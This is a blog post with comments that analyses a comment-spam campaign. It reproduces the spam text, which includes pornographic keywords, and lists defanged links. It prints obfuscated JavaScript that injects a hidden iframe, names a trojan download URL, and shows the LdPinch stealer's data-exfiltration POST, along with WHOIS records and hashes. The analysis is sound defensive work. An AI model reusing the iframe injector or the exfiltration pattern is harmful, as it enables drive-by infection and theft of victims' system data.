Skip navigation.
Home

Blog Spammer

You might notice that from time to time we suffer from Blog Comment SPAM. Generally we just delete it, block the user and move on. However I'm getting kind of tired of it so I decided to analyze the latest round that hit us a bit. Heres the results so far:

The Spam looks something like this, but with hyperlinks here and there:

The Spam:

e9f195616015330be85dfe00e93c4fc3
The Kinetoscope is an early motion picture exhibition device. Rolling Stones Testi, Libreria Blocchi Autocad. Though not a movie projector it was designed for films to be viewed individually through the window of a cabinet housing its components the Kinetoscope video porno scaricare gratis, Scarica Gratis Msn Live Spaces. introduced the basic approach that would become the standard for all cinematic projection before the advent of video: cavalli da salto, Croccantino Gelato. it creates the illusion of movement by conveying a strip of perforated film bearing sequential images over a light source with a high speed shutter. Apt Lombardia, Sherk Cartone Animato. First described in conceptual terms by U.S. inventor Thomas Edison in 1888, video porno com, foto zero assoluto. it was largely developed by his employee William Kennedy Laurie Dickson between 1889 and 1892. Rolling Stones Testi, video hard casalinga gratis. that Desiderius Erasmus nicknamed his academic opponent Jacobus video casalinghe gratis, villaggio vacanza corsica. In April 1894, the first commercial exhibition of motion pictures in history was given in New York City, using ten Kinetoscopes. esercizio svolti elettrotecnica, Falze trevignano. Instrumental to the birth of American movie culture, the Kinetoscope also had a major impact in Europe; video porno con ragazzine, video porno com. its influence abroad was magnified by Edison's decision not to seek international patents on the device, foto privata donna incinta nuda, video clitoride. facilitating numerous imitations of and improvements on the technology.

The URL's all the links go to:
hxxp://mir-t.ru/files/rolling_stones_testi/rolling_stones_testi.htm
hxxp://mebelionika.ru/download/site/libreria_blocchi_autocad/page_libreria_blocchi_autocad.htm
hxxp://mebelionika.ru/download/scarica_gratis_msn_live_spaces/listing/page_scarica_gratis_msn_live_spaces.html
hxxp://dich.com.ua/forum/video_porno_scaricare_gratis/video_porno_scaricare_gratis.htm
hxxp://mir-t.ru/files/cavalli_da_salto.html
hxxp://dich.com.ua/forum/croccantino_gelato.html
hxxp://mir-t.ru/files/apt_lombardia.htm
hxxp://mebelionika.ru/download/index_sherk_cartone_animato.htm
hxxp://dich.com.ua/forum/video_porno_com/page_video_porno_com.htm
hxxp://mebelionika.ru/download/foto_zero_assoluto/foto_zero_assoluto.htm
hxxp://mir-t.ru/files/rolling_stones_testi/rolling_stones_testi.htm
hxxp://dich.com.ua/forum/video_hard_casalinga_gratis/video_hard_casalinga_gratis.htm
hxxp://mir-t.ru/files/video_casalinghe_gratis/video_casalinghe_gratis.htm
hxxp://mebelionika.ru/download/villaggio_vacanza_corsica/comp/page_villaggio_vacanza_corsica.htm
hxxp://dich.com.ua/forum/esercizio_svolti_elettrotecnica/esercizio_svolti_elettrotecnica.htm
hxxp://mebelionika.ru/download/falze_trevignano/falze_trevignano.htm
hxxp://mir-t.ru/files/video_porno_con_ragazzine/page_video_porno_con_ragazzine.html
hxxp://dich.com.ua/forum/video_porno_com/page_video_porno_com.htm
hxxp://mir-t.ru/files/foto_privata_donna_incinta_nuda/style/foto_privata_donna_incinta_nuda.html
hxxp://mebelionika.ru/download/video_clitoride/index/index_video_clitoride.html

So we looked at some of the source of those pages (they are all pretty much the same junk).

They are making iframes and obfuscating it so its not immediately noticeable:

var x = "rame";
var y = "i" + "f";
var el = document.createElement(y + x);
el.setAttribute("width", 1);
el.setAttribute("height", 1);
el.setAttribute("s" + "rc", p);
el.setAttribute("marg" + "inwidth", 0);
el.setAttribute("marg" + "inheight", 0);
el.setAttribute("scr" + "olling", "no");
el.setAttribute("f" + "rameborder", "0");
if (document.body) {
document.body.appendChild(el);
} else {
if (window.addEventListener) {
window.addEventListener("load", (function(e) {document.body.appendChild(el);}), false);
} else if (window.attachEvent) {
window.attachEvent("onload", (function(e) {document.body.appendChild(el);}), false);
} else {
window.onload = (function(e) {document.body.appendChild(el);});
}
}

Then they try to get you to download an exe hxxp://updateonline.cc/pornocrawler.exe (bad evil, don't download it!.

This file is identified as:

AntiVir - - TR/Dropper.Gen
BitDefender - - Dropped:Trojan.PWS.LdPinch.TGB
DrWeb - - Trojan.MulDrop.10866
F-Secure - - LdPinch.gen1
Ikarus - - Generic.LdPinch1
Kaspersky - - Trojan-PSW.Win32.LdPinch.fbw
Microsoft - - TrojanDropper:Win32/Small
Norman - - LdPinch.gen1
Panda - - Suspicious file
Prevx1 - - Trojan.Gorhax
Webwasher-Gateway - - Trojan.Dropper.Gen

pornocrawler.exe runs and looks like its extracting files. In the background its making network connections:

DNS lookups to:
ya.ru
www.updateonline.cc

Then it does:

POST /winupdate/newgate/gate.php HTTP/1.0
Host: www.updateonline.cc
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 14390

The Date is base 64 encoded
a=roots982@mail.ru333&b=Pinch_report&d=report.bin&c=UDNNTAAAAAARIAAAEQAAAAAAAA

... snip

AAAAAA==

Whats in the encoded data is a bunch of info about the machine such as what you have installed, hostname, domain name, internal IP, and other data.

It also installs the actual PornoCrawler and makes some connections out:

hxxp//qzip.cjb.net

The porncrawler actually connects out to www.pornocrawler.ws
GET / HTTP/1.1
Host: www.bitchgallery.com
Connection: close
Accept: */*

GET /main.htm HTTP/1.1
Host: dirty.little-bitch.com
Connection: close
Accept: */*

Etc.

Then drops flashget.exe which is custom packed and is the process that actually sends the base64 POST and is identified as Trojan.PWS.LdPinch.TGB

So who is doing this? Well the person is using an email address whose domain is owned by a Chinese company, the IP is hosted in Prague, CZ. He's coming from an IP address thats hosted on a German ISP and the links redirect you to alot of Russian sites. The predominate language uses is Italian.

The email address he is using:

qff09296@averfame.org

Sponsoring Registrar:EstDomains, Inc. (R1345-LROR)
Status:OK
Registrant ID:DI_5745467
Registrant Name:Harold Lani
Registrant Organization:China Construction Bank
Registrant Street1:Mansion, No.31 Guangji Street
Registrant Email:harold@avereanoia.org

averfame.org = 78.108.181.22
inetnum: 78.108.180.0 - 78.108.183.255
netname: UPL-NET-CUSTOMERS
descr: UPL Telecom
country: CZ
changed: serge@upl.cz 20071227
ddress: UPL TELECOM s.r.o
address: Vinohradska 184/2396
address: Prague 3,130 52
address: Czech Republic

The IP he is coming from:
212.227.118.40

canonical name infong113.kundenserver.de.
aliases
addresses 212.227.118.40
Domain: kundenserver.de
Type: PERSON
Name: Achim Weiss
Address: Erbprinzenstr. 4 - 12
Pcode: 76133
City: Karlsruhe
Country: DE
Remarks: ID [#6716189/6255634]
Changed: 2001-12-04T12:30:12+01:00

role: Schlund NCC
address: 1&1 Internet AG
address: Brauerstrasse 48
address: D-76135 Karlsruhe
address: Germany
remarks: For abuse issues, please use only abuse@oneandone.net
phone: +49 721 91374 50
fax-no: +49 721 91374 20
e-mail: noc@oneandone.net

The MD5 sums for these samples are :
1a32fc1f222a7f0c28341d96911cd0ff - flashget.exe
f33ffb86241fb528f8c12cc9d8be3126 - pornocrawler.exe

So with a little more time and effort I bet we can find out more :)

V.

Nice

Great job, Val.

I totally dislike spammers, especially when they try to make you download Trojans etc. It happens a lot, but I agree with you that at some point it is enough, and that it's time to do something about it.

I hope you/others will find more about this person.

~KL

yeh we could easily fix this

by adding some stuff to drupal, but we've had other priorities. one of these days we will take care of it.

V.

A litte more info

updateonline.cc
64.28.177.140

DOMAIN WHOIS:

Light (info@updateonline.cc)
Balboa Ave. 3 98
Houston
Texas,77015
US
Tel. +1.2815761540
ns20.esthost.com
ns19.esthost.com

The info was fairly sparse.

NETWORK WHOIS:

OrgName: Cernel, Inc
OrgID: CERNE-3
Address: 23404 W. Lyons Ave #223
City: Santa Clarita
StateProv: CA
PostalCode: 91321
Country: US
OrgAbuseEmail: abuse@cernel.net

This is the site where the malware exe gets downloaded. It doesnt look legitamate at all. The main page only has "under constr" on it and archives don't show that a site was ever there.

Google says:

This site may harm your computer.

The IP address this crap is hosted on is owned by a company called Cernel which seems to be a legitamite ISP.

cernel.net

Maybe contacting them will get them to shut off this site. As of today the malware is still on there.

NOTE: turns out I was wrong on this. Some info I got indicates they are badguys too.

V.